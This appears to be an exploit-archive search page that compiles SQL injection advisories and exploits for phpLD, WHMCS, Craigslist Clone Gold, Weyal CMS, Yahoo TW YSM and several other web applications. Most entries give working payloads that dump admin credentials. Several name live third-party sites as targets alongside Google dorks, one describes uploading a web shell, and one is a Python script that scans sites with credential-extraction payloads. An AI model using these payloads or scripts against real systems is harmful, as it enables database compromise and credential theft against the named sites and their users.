phpld SQL Injection
Search result for 'phpld SQL Injection'
(0.0382990837097 seconds)
fuzion/phpLD 3.3 Blind SQL Injection ( na)
phpLD 3.3 Blind SQL Injection
http://www.phplinkdirectory.com/
magic_quotes_gpc = Off
register_globals = On
Vulnerable:
GET http://site/phpld/page.php?name=
True Request:
(validpagename)' or 1=1#
False Request:
(validpagename)' or 1=0#
Try this (urlencode):
(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc...
Field value example:
{sha1}dd94709528bb1c83d08f3088d4043f4742891f4f
- Seasons Greetings -
- http://nukeit.org -
phpLD version 3.3 suffers from a remote blind SQL injection vulnerability.
fuzion/phpLD 3.3 (page.php name) Blind SQL Injection Vulnerability ( php)
phpLD 3.3 Blind SQL Injection
http://www.phplinkdirectory.com/
magic_quotes_gpc = Off
register_globals = On
Vulnerable:
GET http://site/phpld/page.php?name=
True Request:
(validpagename)' or 1=1#
False Request:
(validpagename)' or 1=0#
Try this (urlencode):
(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc...
Field value example:
{sha1}dd94709528bb1c83d08f3088d4043f4742891f4f
- Seasons Greetings -
- http://nukeit.org -
# milw0rm.com [2008-12-23]
Fallaga/Craigslist Gold SQL Injection ( na)
# Exploit Title: Craigslist Clone Gold SQL injection Vulnerability # Date: 04/05/2013 # Author: Fallaga # Team: FaLLaGa Tunisian Hackers #Script url: http://www.scriptcopy.com/craigslist-clone-script/Craiglist-Gold-4444.html # Version: N/A # Tested on: Demo # CVE : () ############################################################ ####################### #########################[ EXPL0!T ]######################### http://exemple/classifieds2/?view=ads&catid=-1+union+select+concat(email,0x3a,code)+from+clf_ads-- #############################SwT 4 Ever########################## #################### @JaMbA !! GreeTz: Fallaga Team + all tunisian people
Craigslist Clone Gold suffers from a remote SQL injection vulnerability.
XroGuE/Weyal CMS SQL Injection ( na)
================================================
Weyal Cms SQL Injection Vulnerability
================================================
#############################################################################
______ __ __ __ __ __ __ #
/\ _ \/\ \__/\ \__/\ \\ \ /\ \ /'__`\ __ #
\ \ \L\ \ \ ,_\ \ ,_\ \ \\ \ ___\ \ \/'\ /\_\L\ \ _ __ /\_\ _ __ #
\ \ __ \ \ \/\ \ \/\ \ \\ \_ /'___\ \ , < \/_/_\_<_/\`'__\ \/\ \/\`'__\ #
\ \ \/\ \ \ \_\ \ \_\ \__ ,__\/\ \__/\ \ \\`\ /\ \L\ \ \ \/ __\ \ \ \ \/ #
\ \_\ \_\ \__\\ \__\\/_/\_\_/\ \____\\ \_\ \_\ \____/\ \_\/\_\\ \_\ \_\ #
\/_/\/_/\/__/ \/__/ \/_/ \/____/ \/_/\/_/\/___/ \/_/\/_/ \/_/\/_/ #
#
[+] Site: http://tools.Att4ck3r.ir #
[+] Contact: xrogue_p3rsi4n_hack3r@hotmail.com #
#############################################################################
================================================
[-] Name: Weyal Cms SQL Injection Vulnerability
[-] Vendor: N/A
[-] Date: 2013-05-22
[-] Author: XroGuE
[-] Home: http://Att4ck3r.ir
================================================
[+] Dork: intext:"Designed by Rohi.af"
intext:"Designed by Dr. Weyal"
================================================
[+] Vulnerable Page: fullstory.php?id= , countrys.php?countryid= , "check Another pages :)"
[+] Vuln: www.[site].com/[path]/fullstory.php?id=SQLi
www.[site].com/[path]/countrys.php?id=SQLi
[+] Demo: http://mysurgery.ru/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
[+] Demo: http://www.s-rohi.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14
[+] Demo: http://www.vegos.ru/countrys.php?countryid=-999 union all select 1,version(),database()
================================================
Weyal CMS suffers from a remote SQL injection vulnerability. Note that this finding has site-specific information.
Jason Whelan/Speck CMS SQL Injection ( na)
Author: Jason Whelan
PacketStorm: exploitdev
Email: exploitdevj@gmail.com
Target Software: Speck CMS Framework, Latest
Vendor URL: http://www.speckcms.org/
Multiple SQL Injection Vulnerabilities
Examples:
portal/user.cfm:
<cfquery name="qUser" datasource="#request.speck.codb#">
SELECT * FROM spUsers WHERE username = '#url.username#'
</cfquery>
portal/group.cfm:
<cfquery name="qGroup" datasource="#request.speck.codb#">
SELECT * FROM spGroups WHERE groupname = '#url.groupname#'
</cfquery>
Many more exist in this CMS framework. Exploitation will depend on the use
of these files within the user's CMS.
Speck CMS suffers from multiple remote SQL injection vulnerabilities. The latest framework as of 05/02/2013 is affected.
Fallaga/Craigslist Gold - SQL Injection Vulnerability ( php)
# Exploit Title: Craigslist Clone Gold SQL injection Vulnerability # Date: 04/05/2013 # Author: Fallaga # Team: FaLLaGa Tunisian Hackers #Script url: http://www.scriptcopy.com/craigslist-clone-script/Craiglist-Gold-4444.html # Version: N/A # Tested on: Demo # CVE : () ############################################################ ####################### #########################[ EXPL0!T ]######################### http://exemple/classifieds2/?view=ads&catid=-1+union+select+concat(email,0x3a,code)+from+clf_ads-- #############################SwT 4 Ever########################## #################### @JaMbA !! GreeTz: Fallaga Team + all tunisian people
Ebrahim Hegazy/Yahoo! TW YSM MKT Blind SQL Injection ( na)
Title:
======
Yahoo! TW YSM MKT - Blind SQL Injection Vulnerability
Date:
=====
2013-04-03
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=892
VL-ID:
=====
892
Common Vulnerability Scoring System:
====================================
7.1
Introduction:
=============
Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely
known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail,
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports
and its social media website. It is one of the most popular sites in the United States. According to news sources,
roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a
billion consumers every month in more than 30 languages.
(Copy of the Vendor Homepage: http://www.yahoo.com )
Abstract:
=========
An independent researcher (Ebrahim Hegazy) discovered a blind sql injection vulnerability in the Yahoo! Inc TW Marketing Service Application.
Report-Timeline:
================
2013-02-24: Researcher Notification & Coordination
2013-02-25: Vendor Notification
2013-03-01: Vendor Response/Feedback
2013-04-01: Vendor Fix/Patch by check
2013-04-03: Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
A time based blind SQL Injection web vulnerability is detected in the official Yahoo! TW YSM Marketing Application Service.
The vulnerability allows remote attackers to inject own sql commands to compromise the affected application dbms.
The SQL Injection vulnerability is located in the index.php file of the soeasy module when processing to request manipulated
scId parameters. By manipulation of the scId parameter the attackers can inject own sql commands to compromise the webserver
application dbms.
The vulnerability can be exploited by remote attackers without privileged application user account and without required
user interaction. Successful exploitation of the sql injection vulnerability results in application and application
service dbms compromise.
Vulnerable Service(s):
[+] Yahoo! Inc - TW YSM Marketing
Vulnerable Module(s):
[+] soeasy
Vulnerable Module(s):
[+] index.php
Vulnerable Parameter(s):
[+] scId
Proof of Concept:
=================
The time-based sql injection web vulnerability can be exploited by remote attackers without privileged application user account and without
required user interaction. For demonstration or reproduce ...
Vulnerable Service Domain: tw.ysm.emarketing.yahoo.com
Vulnerable Module: soeasy
Vulnerable File: index.php
Vulnerable Parameters: ?p=2&scId=
POC:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--
Payload:
1; union select SLEEP(5)--
Request:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)--
GET /soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)-- HTTP/1.1
Host: tw.ysm.emarketing.yahoo.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: is_c=1; device=pc; showNews=Y; B=9tgpb118ilu04&b=3&s=mu; AO=o=1&s=1&dnt=1; tw_ysm_soeasy=d%3D351d9185185129780476f856.
17880929%26s%3DxLxK2mb96diFbErWUyv_jGQ--; __utma=266114698.145757337399.1361672202.1361672202.1361672202.1; __utmb=2663114698.
1.10.1361672202; __utmc=2636114698; __utmz=266114698.13616732202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
DNT: 1
Connection: keep-alive
HTTP/1.0 200 OK
Date: Sun, 24 Feb 2013 02:16:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi
SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Note:
Since it'a time based blind so the page will not give an output as a result in the reply, but it will SLEEP/DELAY for 5 seconds before it load.
Solution:
=========
The vulnerability can be patched by a restriction and secure parse of the scId parameter request.
Risk:
=====
The security risk of the time based blind sql injection web vulnerability is estimated as critical.
Credits:
========
Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [hegazy@vulnerability-lab.com] (research@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: admin@vulnerability-lab.com
Yahoo! TW YSM MKT suffered from a remote blind SQL injection vulnerability.
Ahmed Aboul-Ela/WHMCS 4.5.2 SQL Injection ( na)
# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php"
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and perior versions should be affected too
# Tested on: Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sql Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Vulnerable Code Snippet :
LINE 582: function pdfInvoice($id)
LINE 583: {
LINE 686: if ($CONFIG['GroupSimilarLineItems'])
LINE 687: {
LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
LINE 689: }
As we can see here the $id argument of pdfInvoice function have been used directly at mysql query without any sanitization which leads directly to Sql Injection
It appears that pdfInvoice function is being called at "/dl.php" file as the following:
LINE 21: if ($type == 'i')
LINE 22: {
LINE 23: $result = select_query('tblinvoices', '', array(
LINE 24: 'id' => $id
LINE 25: ));
LINE 26: $data = mysql_fetch_array($result);
LINE 27: $invoiceid = $data['id'];
LINE 28: $invoicenum = $data['invoicenum'];
LINE 29: $userid = $data['userid'];
LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
LINE 31: {
LINE 32: downloadLogin();
LINE 33: }
LINE 34: if (!$invoicenum)
LINE 35: {
LINE 36: $invoicenum = $invoiceid;
LINE 37: }
LINE 38: require('includes/clientfunctions.php');
LINE 39: require('includes/countries.php');
LINE 40: require('includes/invoicefunctions.php');
LINE 41: require('includes/tcpdf.php');
LINE 42: $pdfdata = pdfInvoice($id);
LINE 43: header('Pragma: public');
LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
LINE 47: header('Cache-Control: private', false);
LINE 48: header('Content-Type: application/octet-stream');
LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
LINE 50: header('Content-Transfer-Encoding: binary');
LINE 51: echo $pdfdata;
LINE 52: exit();
LINE 53: return 1;
LINE 54: }
As we can see at LINE "42" the pdfInvoice function have been called and passed $id Variable without any sanitization
Afterwards it force the browser to download the generated invoice in PDF format
- Proof of Concept for Exploitation
To Dump Administrator Credentials (user & pass):
http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
~ Result: The Browser will prompt download for the pdf invoice file after opening it you should find the username and pw hash there :)
- Precondition to Successfully Exploit the Vulnerability:
"Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default )
- Credits:
Ahmed Aboul-Ela - Information Security Consultant @ Starware Group
WHMCS version 4.5.2 suffers from a remote SQL injection vulnerability.
Ashiyane Digital Security Team/Beat Websites 1.5 SQL Injection ( na)
############## # Exploit Title : Beat Websites CMS SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # vendor Home : http://www.beatwebsites.com/ # # Home : www.Ashiyane.org # # Security Risk : Medium # # Version : 1.5 # # Dork : "Powered by: Beat Websites" inurl:beats.php?gid= # ############## #Location : site/beats.php?gid=[SQL] # # #Dem0: # http://24hrbeats.com/beats.php?gid=1%27 # http://www.rocbeats.com/beats.php?gid=10%27 # http://beatsbyyou.com/beats.php?gid=8%27 # http://beatfaktory.com/beats.php?gid=20%27 # http://www.hiphopbeatfactory.com/beats.php?gid=6%27 # http://multiplatinumproducers.com/beats.php?gid=11%27 # http://www.icebergbeats.net/beats.php?gid=4%27 ############## #Greetz to: My Lord ALLAH ############## # # Amirh03in # ##############
Beat Websites version 1.5 suffers from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
Ashiyane Digital Security Team/Wordpress Flagallery-Skins SQL Injection ( na)
############## # Exploit Title : Wordpress Flagallery-skins plugin SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # Home : www.ashiyane.org # # Security Risk : Medium # # Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist= # # Tested on: Linux # ############## #Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL] # # #DEm0: # http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27 # # http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27 # # http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27 # # http://www.unclebobsrockshop.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=songs%27 # # http://headingtoawedding.ca/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=homepage%27 # ############## #Greetz to: My Lord ALLAH ############## # # Amirh03in # ##############
Wordpress Flagallery-skins plugin suffers from an SQL Injection vulnerability. Note that this advisory has site-specific information.
Ashiyane Digital Security Team/Iron Lava Corp Shell Upload / SQL Injection ( na)
############## # Exploit Title : Iron Lava Corp SQL Injection / SHell upload # # Exploit Author : Ashiyane Digital Security Team # # vendor home : http://www.ironlava.com/ # # Home : www.ashiyane.org # # Security Risk : High # # Dork : "Site Design by Iron Lava Corp." inurl:index.php?pid= # ############## #Location:site/index.php?pid=[SQL] # # #DEm0: # http://www.efcaviation.ca/index.php?pid=-61%20union%20select%201,2,3,4,5,6,7,8,9,10,11,group_concat%28table_name%29,13,14,15%20from%20information_schema.tables%20where%20table_schema=0x65666364657663616462%23 # # http://fourleg.com/index.php?pid=20%27 # # http://www.caninefitness.com/index.php?pid=8%27 # # http://www.bloomfunds.ca/index.php?pid=19%27 ################################################# #admin panle : site/admin ############################################### # For Upload shell # # after login go to MANAGE IMAGES And upload your shell # and open your shell : site/images/shell.php # #GOOD luck :D # ############## #Greetz to: My Lord ALLAH ############## # # Amirh03in # ##############
Sites designed by Iron Lava Corp suffer from remote shell upload and remote SQL injection vulnerabilities. Note that this advisory has site-specific information.
NoGe/ZAPms 1.41- SQL Injection Vulnerability ( php)
=============================================================================================================
[o] ZAPms <= SQL Injection Vulnerability
Software : ZAPms
Version : 1.41
Vendor : http://www.zapms.de
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : ZAPms is free open source web content management system,
adapted to the needs of businesses on the Internet.
The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.
=============================================================================================================
[o] Exploit
http://localhost/[path]/products?pid=[SQLi]
=============================================================================================================
[o] PoC
http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
=============================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] April 09 2013 - Papua, Indonesia
baltazar/IT Media SQL Injection Exploit ( na)
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
import sys, os, time, re, urllib2, httplib, socket
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
proxy = "None"
count = 0
if len(sys.argv) < 2 or len(sys.argv) > 4:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Help: itmedia.py -h |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h':
print "\n|-------------------------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Usage: itmedia.py www.site.com |"
print "| Example: itmedia.py http://www.blagoleks.net |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|-------------------------------------------------------------------------------|\n"
sys.exit(1)
elif arg == '-p':
proxy = sys.argv[count+1]
count += 1
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "/":
site = site+"/"
vulnsql = ["vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass,0x62616c74617a6172),3,4,5,6,7+from+admin--","vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172)+from+admin--","vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5,6,7,8,9,10+from+admin--","galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass,0x62616c74617a6172)+from+admin--","galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5+from+admin--","ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass,0x62616c74617a6172),3+from+admin--","ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4+from+admin--","slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5+from+admin--"]
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
socket.setdefaulttimeout(20)
try:
if proxy != "None":
print "[+] Proxy:",proxy
print "\n[+] Testing Proxy..."
pr = httplib.HTTPConnection(proxy)
pr.connect()
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
proxyfier = urllib2.build_opener(proxy_handler)
proxyfier.open("http://www.google.com")
print
print "\t[!] w00t!,w00t! Proxy: "+proxy+" Working"
print
else:
print "[-] Proxy not given"
print
proxy_handler = ""
except(socket.timeout):
print
print "\t[-] Proxy Timed Out"
print
sys.exit(1)
except(),msg:
print msg
print "\t[-] Proxy Failed"
print
sys.exit(1)
try:
url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address="
except(IndexError):
print "[-] Wtf?"
proxyfier = urllib2.build_opener(proxy_handler)
proxy_check = proxyfier.open(url).readlines()
for line in proxy_check:
if re.search("<br><br>", line):
line = line.replace("</b>","").replace('<br>',"").replace('<b>',"")
print "\n[!]",line,"\n"
print "[+] Target:",site
print "[+]",len(vulnsql),"Vulns loaded..."
print "[+] Starting Scan..\n"
for sql in vulnsql:
print "[+] Checking:",site+sql.replace("\n","")
print
try:
source = proxyfier.open(site+sql.replace("\n", "")).read()
search = re.findall("baltazar",source)
if len(search) > 0:
print "[!] w00t!w00t" ,site+sql.replace("\n", "")
print
except(KeyboardInterrupt, SystemExit):
raise
except:
pass
print
print
print
print """\tDork : inurl:/galerija.php?op=slika
inurl:/ponuda.php?op=slika
inurl:/vijest.php?id= intext:itmedia
inurl:/slike.php?op=slika
"""
print
print "Check for more details: http://packetstormsecurity.org/0808-exploits/itmedia-sql.txt"
print "\n[-] %s" % time.strftime("%X")
Remote SQL injection exploit for IT Media.
tempe_mendoan/Venetaweb SQL Injection ( na)
.___ .___ .__
| | ____ __| _/ ____ ____ ____ ______|__|_____
| | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \
| || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_
|___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /
\/ \/ \/ \/ \/ \/
[~]===========================================================================[~]
[~]Title : Venetaweb SQL Injection
[~]Vendor : http://www.venetaweb.it/
[~]Author : tempe_mendoan
[~]Google Dork : "Web powered by Venetaweb"
[~]===========================================================================[~]
#################################################################################
===[ Exploit ]===
[»] http://localhost/photogallery.php?id=[SQL]
[»] http://localhost/products_category.php?id=[SQL]
[»] http://localhost/prodotto.php?id=[SQL]
##################################################################################
##################################################################################
===[ Admin Login ]===
[+] http://localhost/admin_login.php
##################################################################################
Greats T0 :
./ And All My Friend
Note :
./ I Love You Dila :*
Venetaweb suffers from a remote SQL injection vulnerability.
the_cyber_nuxbie/EDinteractive SQL Injection ( na)
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Official Website: http://www.1337day.com 0 1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1 0 0 1 ########################################## 1 0 I'm NuxbieCyber Member From Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ======================================================================== <<<|>>> EDinteractive - SQL Injection Vulnerability <<<|>>> ======================================================================== - Discovered By: ||| TheCyberNuxbie - Independent Security Research ||| <<< staff@thecybernuxbie.com >>> CP: +62856-2538-963 $ YM: nux_exploit Credit : Catur Febrian [ nuxbie ] - Info WebApps: This Content Develop By EdInteractive: © 2012 EDinteractive - Web development and Content Management Systems T: 0161 295 4127 | E: info@edinteractive.co.uk http://edinteractive.co.uk/pages/portfolio.php?t=website_advanced - Google Dork: intext:"Site by EDinteractive" intext:"Site developed by EDinteractive" - Exploit Concept: http://lokalisasi/WebApps/index.php?id=[SQL Injection] - Sample WebApps Vuln SQLi: http://sportstockport.org.uk/cms/news/article/index.php?id=63' + [SQL Injection] http://quantumenquiries.com/cms/news/article/?id=19' + [SQL Injection] http://tenants-hall.co.uk/cms/news/article/?id=14' + [SQL Injection] http://afemaichildrenstrust.org.uk/cms/news/article/?id=36' + [SQL Injection] http://elie-project.eu/cms/news/article/?id=13' + [SQL Injection] http://ece.salford.ac.uk/cms/news/article/?id=26' + [SQL Injection] http://ngtc.co.uk/cms/news/article/?id=51' + [SQL Injection] http://digital.salford.ac.uk/cms/news/article/?id=78' + [SQL Injection] http://ourmiddleton.org.uk/cms/news/article/?id=80' + [SQL Injection] http://healthforall.org.uk/cms/news/article/?id=34' + [SQL Injection] http://bann.org.uk/cms/news/article/?id=67' + [SQL Injection] http://ktp.salford.ac.uk/cms/news/article/?id=109' + [SQL Injection] http://nnbg.org.uk/web/news/article/?id=55' + [SQL Injection] , And Many More @ Google...!!! [x] Greetz,,, *** 1337day Inj3ct0r TEAM *** ...:::' All Member & Staff Inj3ct0r TEAM ':::... - Special Thanks: Alloh SWT (GOD) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Aku pengen kuliah, tapi aku nggak punya biaya,,, Maaf, exploit ini jadi tempat curhat-ku,,, =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [ Inj3ct0r | PacketStromSecurity | Exploit-DB ] Me @ Solo Raya, 15 March 2012 @ 07:46 PM. Central Java, Indonesian. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
EDinteractive suffers from a remote SQL injection vulnerability.